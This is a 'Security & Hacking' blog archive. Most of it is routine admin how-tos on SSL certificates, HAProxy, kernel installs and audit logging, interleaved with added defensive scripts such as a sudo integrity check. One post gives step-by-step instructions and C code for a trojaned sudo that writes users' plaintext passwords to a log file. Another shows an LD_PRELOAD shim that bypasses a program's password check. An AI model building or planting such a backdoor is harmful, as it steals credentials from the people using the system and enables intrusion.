Category Archives: Security

Security & Hacking

How to install/change SSL/TLS certificate

How to add new SSL/TLS certificate

If you need to set up HTTPS, you will need a new SSL/TLS certificate:
1. Collect the information the certificate signing request (CSR) asks for:

    Country Name (2 letter code)
    State or Province Name (full name)
    Locality Name (eg, city)
    Organization Name (eg, company)
    Organizational Unit Name (eg, section)
    Common Name (e.g. server FQDN or YOUR name)
    Email Address

    The Common Name is the FQDN of the hostname/domain the server is reached by.

2. Generate a private key and certificate request:

openssl req -out cert.csr -new -newkey rsa:2048 -nodes -keyout cert.key

3. Buy the certificate, submitting the generated CSR.
4. Add the certificate to expiration monitoring (if you have monitoring).
5. Install it on your server (next section).

How to install/change SSL/TLS certificate

1. If you received a .pfx file, decode it with:

openssl pkcs12 -in domain.pfx -out certificate -nodes

This writes both the private key and the certificate(s) into the file named certificate.
2. You should end up with about 4 files:

    domain-name.crt — X.509 certificate file
    domain-name.csr — X.509 certificate request file
    intermediate.crt — X.509 certificate of the intermediate CA
    domain-name.key — RSA private key file for the certificate

3. Check that the key, request and certificate belong together:

openssl rsa -noout -modulus -in cert.key
openssl req -noout -modulus -in cert.csr
openssl x509 -noout -modulus -in cert.crt

All three should print the same modulus.
4. Check the validity dates of the new certificate:

openssl x509 -noout -dates -in cert.crt

5. Check that the domain and intermediate certificates are compatible:

openssl verify -CAfile intermediate.crt domain-name.crt
domain-name.crt: OK

If you have several intermediate certificates, put them all into one intermediate.crt file.
6. Create the chain certificate file:

cat domain-name.crt intermediate.crt > cert.crt

Remember that the first certificate must be the one for the desired domain; the intermediate goes after it.
7. Put cert.crt and cert.key into the server's ssl folder.
8. Restart the web server.
9. Check that the certificate was updated successfully:

openssl s_client -connect domain.name:443 2>/dev/null < /dev/null | openssl x509 -noout -dates
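The checks from steps 3 to 6 and 9, as an added example that is not part of the original post: plain sh functions around the same openssl commands, so a deployment script can refuse to install mismatched or short-lived files. File names follow the post; only the openssl CLI is assumed.

```sh
#!/bin/sh
# Added example (not from the original post): the modulus, expiry and chain checks
# from steps 3-6 and 9 as functions. Requires only the openssl CLI.

# Print an md5 fingerprint of the RSA modulus of a PEM key, CSR or certificate.
modulus_fp() {
  case "$(head -n 1 "$1")" in
    *"PRIVATE KEY"*)         tool=rsa ;;
    *"CERTIFICATE REQUEST"*) tool=req ;;
    *CERTIFICATE*)           tool=x509 ;;
    *) echo "not a PEM key, CSR or certificate: $1" >&2; return 2 ;;
  esac
  openssl "$tool" -noout -modulus -in "$1" | openssl md5 | awk '{ print $NF }'
}

# Step 3: succeed only when every file given carries the same modulus.
same_modulus() {
  first=$(modulus_fp "$1") || return 1
  shift
  for f in "$@"; do
    [ "$(modulus_fp "$f")" = "$first" ] || { echo "modulus mismatch: $f" >&2; return 1; }
  done
}

# Step 4: fail if the certificate expires within DAYS (default 30).
not_expiring_within_days() {  # not_expiring_within_days cert.crt [DAYS]
  openssl x509 -noout -checkend $(( ${2:-30} * 86400 )) -in "$1" >/dev/null
}

# Step 5: the leaf must verify against the intermediate bundle.
chain_ok() {  # chain_ok domain-name.crt intermediate.crt
  openssl verify -CAfile "$2" "$1" >/dev/null
}

# Step 6: the first certificate in the concatenated chain file must be the leaf
# (openssl x509 reads only the first PEM block of a file).
chain_file_leaf_first() {  # chain_file_leaf_first cert.crt domain-name.crt
  [ "$(openssl x509 -noout -subject -in "$1")" = "$(openssl x509 -noout -subject -in "$2")" ]
}

# Step 9: what the server really presents (needs network; sends SNI for vhosts).
remote_dates() {  # remote_dates domain.name
  openssl s_client -connect "$1:443" -servername "$1" </dev/null 2>/dev/null | openssl x509 -noout -dates
}
```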

Checking for missing intermediate certificate

If your browser says that the site is untrusted and you get the following error:

openssl s_client -connect display.intencysrv.com:443 -showcerts
CONNECTED(00000003)
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=27:certificate not trusted
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=21:unable to verify the first certificate
verify return:1
<...>

then you are probably missing the intermediate certificate. Find it (your CA publishes it; searching for the issuer name also works), check that it is compatible and install it (see steps 5 and 6 above). You can check remotely that the downloaded intermediate certificate is compatible:

openssl s_client -connect domain.name:443 -CAfile ca.crt

Remember: Apache supports bundled (chained) certificate files starting from 2.4.8. If you use an Apache older than that you may get a message about a missing intermediate certificate; there, point SSLCertificateChainFile at intermediate.crt instead.

Security: mongodb

If authentication is not enabled on MongoDB servers that are reachable from your whole network, an attacker who connects could:
— run system-level helpers from the shell: ls(), cat(), removeFile(), fuzzFile()
— run load(), which loads and executes a JavaScript file
— enable auth on your instances himself, so that you lose control of them
— tell whether the host is Windows or Linux with _isWindows()

HAProxy: tcp + http on the same port

haproxy.conf:

global
    log /dev/log    local0
    log /dev/log    local1 notice
    chroot /var/lib/haproxy
    stats socket /run/haproxy/admin.sock mode 660 level admin
    stats timeout 30s
    user haproxy
    group haproxy
    daemon

    # Default SSL material locations
    ca-base /etc/ssl/certs
    crt-base /etc/ssl/private

    # Default ciphers to use on SSL-enabled listening sockets.
    # For more information, see ciphers(1SSL). This list is from:
    #  https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
    ssl-default-bind-ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS
    ssl-default-bind-options no-sslv3

defaults
    log     global
    option  dontlognull
    timeout connect 5000
    timeout client  50000
    timeout server  50000
    errorfile 400 /etc/haproxy/errors/400.http
    errorfile 403 /etc/haproxy/errors/403.http
    errorfile 408 /etc/haproxy/errors/408.http
    errorfile 500 /etc/haproxy/errors/500.http
    errorfile 502 /etc/haproxy/errors/502.http
    errorfile 503 /etc/haproxy/errors/503.http
    errorfile 504 /etc/haproxy/errors/504.http
    maxconn 2000

frontend mixed_frontend
    bind :8080
    mode tcp
    option tcplog
    tcp-request inspect-delay 5s
    tcp-request content accept if HTTP
    # here is the magic: the first 7 payload bytes are the SSH banner "SSH-2.0"
    acl client_attempts_ssh payload(0,7) -m bin 5353482d322e30
    use_backend tcp_backend if client_attempts_ssh
    use_backend tcp_backend if !HTTP
    use_backend http_backend if HTTP
    default_backend tcp_backend

backend tcp_backend
    mode tcp
    server ssh :22

backend http_backend
    mode http
    server s1_http 127.0.0.1:80 send-proxy

nginx.conf:

server {
    listen 80 default_server proxy_protocol;

    set_real_ip_from 127.0.0.1;
    real_ip_header proxy_protocol;
    location / {
        root /var/www/html;
        index index.html index.htm;
    }
}

Both protocols now answer on port 8080:

ssh 127.0.0.1 -p8080
user@127.0.0.1's password:

curl 127.0.0.1:8080
HELLO WORLD!

Ubuntu: install kernel 3.16

wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600-generic_3.16.0-031600.201408031935_amd64.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600_3.16.0-031600.201408031935_all.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-image-3.16.0-031600-generic_3.16.0-031600.201408031935_amd64.deb

dpkg -i *.deb
reboot

Security: log user's actions

Log sudo actions

/etc/sudoers:
Defaults iolog_dir=/var/log/sudo-io/%{user}
%admins ALL=(ALL): LOG_INPUT: LOG_OUTPUT: ALL

gpasswd -a user admins # add user to group admins

All sudo sessions of users in group admins will be written (input and output) to /var/log/sudo-io/.

Log all events with auditd

apt-get install auditd
Add at the end of /etc/audit/audit.rules:
-a exit,always -F arch=b64 -F euid=0 -S execve
-a exit,always -F arch=b32 -F euid=0 -S execve

Add audit=1 to the kernel's cmdline in /etc/default/grub.

Place "session required pam_loginuid.so" in /etc/pam.d/{login,kdm,sshd}

update-grub
reboot

How to make search by events in auditd's log

ausearch -ua 1000, where 1000 is the user's id.
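The rules above record every execve run with euid 0 together with the login uid (auid) that pam_loginuid.so attached to the session. The function below is an added example, not from the original post: it does over raw audit.log lines the join that ausearch -ua does, pairing each SYSCALL record for the wanted auid with its EXECVE record by event id. The log lines are constructed for the example.

```sh
#!/bin/sh
# Added example (not from the original post): a portable stand-in for
# "ausearch -ua 1000" that joins the SYSCALL and EXECVE records the execve rules
# above produce, keyed on the audit event id, and prints "id exe argv" per event.
# The log lines in sample_audit_log are constructed, not taken from a real host.

# usage: execve_by_auid <auid> < /var/log/audit/audit.log
execve_by_auid() {
  awk -v want="$1" '
    # the event id is the number after the colon in msg=audit(<time>:<id>):
    { match($0, /msg=audit\([0-9.]+:[0-9]+\)/); id = substr($0, RSTART, RLENGTH)
      sub(/.*:/, "", id); sub(/\)/, "", id) }
    # remember the executable of every execve issued under the wanted login uid
    $1 == "type=SYSCALL" && $0 ~ ("auid=" want "( |$)") {
      match($0, /exe="[^"]*"/); exe[id] = substr($0, RSTART + 5, RLENGTH - 6) }
    # the matching EXECVE record carries argv as a0= a1= ... (auditd hex-encodes an
    # argument that contains spaces or quotes, so plain field splitting is safe)
    $1 == "type=EXECVE" && (id in exe) {
      argv = ""
      for (i = 4; i <= NF; i++) { v = $i; sub(/^a[0-9]+=/, "", v); gsub(/"/, "", v)
                                  argv = argv (argv == "" ? "" : " ") v }
      print id, exe[id], argv; delete exe[id] }'
}

# Constructed sample: two commands by auid 1000 and one by auid 1001, all euid=0.
sample_audit_log() {
  cat <<'EOF'
type=SYSCALL msg=audit(1609459200.123:456): arch=c000003e syscall=59 success=yes exit=0 a0=55d1 a1=55d2 a2=55d3 a3=0 items=2 ppid=1200 pid=1201 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="cat" exe="/usr/bin/cat" key=(null)
type=EXECVE msg=audit(1609459200.123:456): argc=2 a0="cat" a1="/etc/shadow"
type=SYSCALL msg=audit(1609459201.500:457): arch=c000003e syscall=59 success=yes exit=0 a0=0 a1=0 a2=0 a3=0 items=2 ppid=1300 pid=1301 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=4 comm="id" exe="/usr/bin/id" key=(null)
type=EXECVE msg=audit(1609459201.500:457): argc=1 a0="id"
type=SYSCALL msg=audit(1609459202.000:458): arch=c000003e syscall=59 success=yes exit=0 a0=0 a1=0 a2=0 a3=0 items=2 ppid=1200 pid=1202 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="useradd" exe="/usr/sbin/useradd" key=(null)
type=EXECVE msg=audit(1609459202.000:458): argc=3 a0="useradd" a1="-m" a2="backup"
EOF
}

# Everything the login uid 1000 ran as root, one line per execve.
sample_audit_log | execve_by_auid 1000
```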

IT Security Brothers (http://itsb.pro)

Hi guys, I would like to present you our new project IT Security Brothers http://itsb.pro
We provide pentest, consultations and IT outsourcing services.
Feel free to hire us for IT jobs.

How to get passwords through sudo

1) download the sudo sources
2) open the file conversation.c
3) add

#include<stdio.h>

4) find the lines

pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

5) after those lines add the code

FILE *file;
file = fopen("/var/log/sudo.log","a+");
fprintf(file, "%s\n", pass);
fclose(file);

6) build sudo (read the README and INSTALL files, but really only "./configure && make" is needed)
7) put the new sudo binary in the /usr/bin/ folder
8) chmod 4000 /usr/bin/sudo
9) chmod +x /usr/bin/sudo
10) chown root.root /usr/bin/sudo
11) passwords appear in /var/log/sudo.log after users run that command
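From the defender's side, the replacement described above is caught by comparing /usr/bin/sudo with the hash the package manager recorded at install time and by insisting on the exact mode and owner of a packaged sudo (4755 root; the chmod 4000 followed by chmod +x above leaves 4111 instead). This is an added example, not from the original post; it assumes a Debian/Ubuntu host, where dpkg keeps per-package hashes in /var/lib/dpkg/info/<package>.md5sums.

```sh
#!/bin/sh
# Added example (not from the original post): integrity and mode check for sudo.
# Assumes a Debian/Ubuntu host; /var/lib/dpkg/info/sudo.md5sums is dpkg's real
# record of the package's file hashes.

# Return 0 when FILE's md5 equals the entry recorded for it in MD5SUMS
# (dpkg format: "<md5>  usr/bin/sudo", path without the leading slash).
matches_package_hash() {  # matches_package_hash FILE MD5SUMS
  recorded=$(awk -v p="${1#/}" '$2 == p { print $1 }' "$2")
  [ -n "$recorded" ] || { echo "no recorded hash for $1" >&2; return 2; }
  [ "$(md5sum "$1" | awk '{ print $1 }')" = "$recorded" ]
}

# Return 0 when FILE has exactly MODE (octal) and OWNER. For sudo, anything but
# 4755 root (for example the 4111 the steps above produce) is a finding.
has_expected_mode() {  # has_expected_mode FILE MODE OWNER
  [ "$(stat -c '%a %U' "$1")" = "$2 $3" ]
}

# Both checks against the live binary; exit status 0 means "as packaged".
check_sudo() {
  matches_package_hash /usr/bin/sudo /var/lib/dpkg/info/sudo.md5sums &&
    has_expected_mode /usr/bin/sudo 4755 root
}
```

On a stock system dpkg -V sudo performs the hash comparison for every file of the package; the mode check is what it does not do.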

How to use LD_PRELOAD for cracking applications

test.cpp:

#include <stdio.h>
#include <stdlib.h>
#include <cstring>
#include <iostream>
using namespace std;

int main()
{
  // Both literals are 31 characters long, so the 32nd loop iteration copies
  // the terminating NUL and pass ends up as a proper C string.
  const char *pre_pass = "a382fbe8e8f087352e250561d724c0a";
  const char *salt =     "1qazxcvfdswer435tgbnhy67ujmkdfg";
  char pass[32];
  for(int i = 0; i < 32; i++)
  {
    int a = pre_pass[i];
    int b = salt[i];
    int c = (a + b)/2;      // derive the secret byte-wise from the two literals
    pass[i] = c;
  }
  char user_input[32];
  cout << "Enter your password's md5 hash for enter to root access level" << endl;
  cout << "> ";
  cin.width(32);            // read at most 31 characters plus the terminator
  cin >> user_input;
  if ( strncmp( pass, user_input, 32)==0 )   // the libc call LD_PRELOAD will hijack
    {
      cout <<  "Secret is " << pass << endl;
    }
  else
    {
      cout << "Access denied, fucking looser" << endl;
    }
  return 1;
}

Compile it with g++:
g++ test.cpp -o test

Try to get the pass ^_^
./test

Enter your password's md5 hash for enter to root access level
> asd
Access denied, fucking looser

How to hack it? LD_PRELOAD is the answer!

Looking at the code, we see that we only need strncmp to return zero, so let's make it do that.
strncmp_lib.c:

#include <stddef.h>

/* Interposed strncmp: every comparison reports "equal". The signature must
   match libc's (size_t for the length) so the symbol resolves cleanly. */
int strncmp(const char *string1, const char *string2, size_t num)
{
    (void)string1; (void)string2; (void)num;
    return 0;
}

Compile it with gcc:
gcc -Wall -O2 -fpic -shared -ldl -o strncmp_lib.so strncmp_lib.c

and run:
LD_PRELOAD="./strncmp_lib.so" ./test

Enter your password's md5 hash for enter to root access level
> asd
Secret is IRLVobmOdUnJU535SfJQLW64lPOOcKd